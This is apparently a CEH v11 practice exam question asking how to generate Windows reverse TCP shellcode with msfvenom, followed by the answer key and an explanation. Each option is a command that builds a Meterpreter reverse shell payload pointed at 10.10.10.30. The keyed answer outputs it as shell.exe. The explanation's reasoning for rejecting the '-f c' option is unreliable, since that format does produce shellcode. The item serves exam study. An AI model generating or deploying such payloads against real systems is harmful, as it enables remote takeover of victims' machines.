Certified Ethical Hacker (CEH v11) — Question 188

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

Answer options

• A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
• B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
• C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
• D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Correct answer: C

Explanation

Option C is correct because it specifies the correct parameters, including LHOST for the local host and outputs the shellcode in executable format to 'shell.exe'. Options A and B incorrectly use the '-f c' format, which is not intended for executable output. Option D mistakenly uses RHOST instead of LHOST, which is not appropriate for establishing a reverse TCP connection.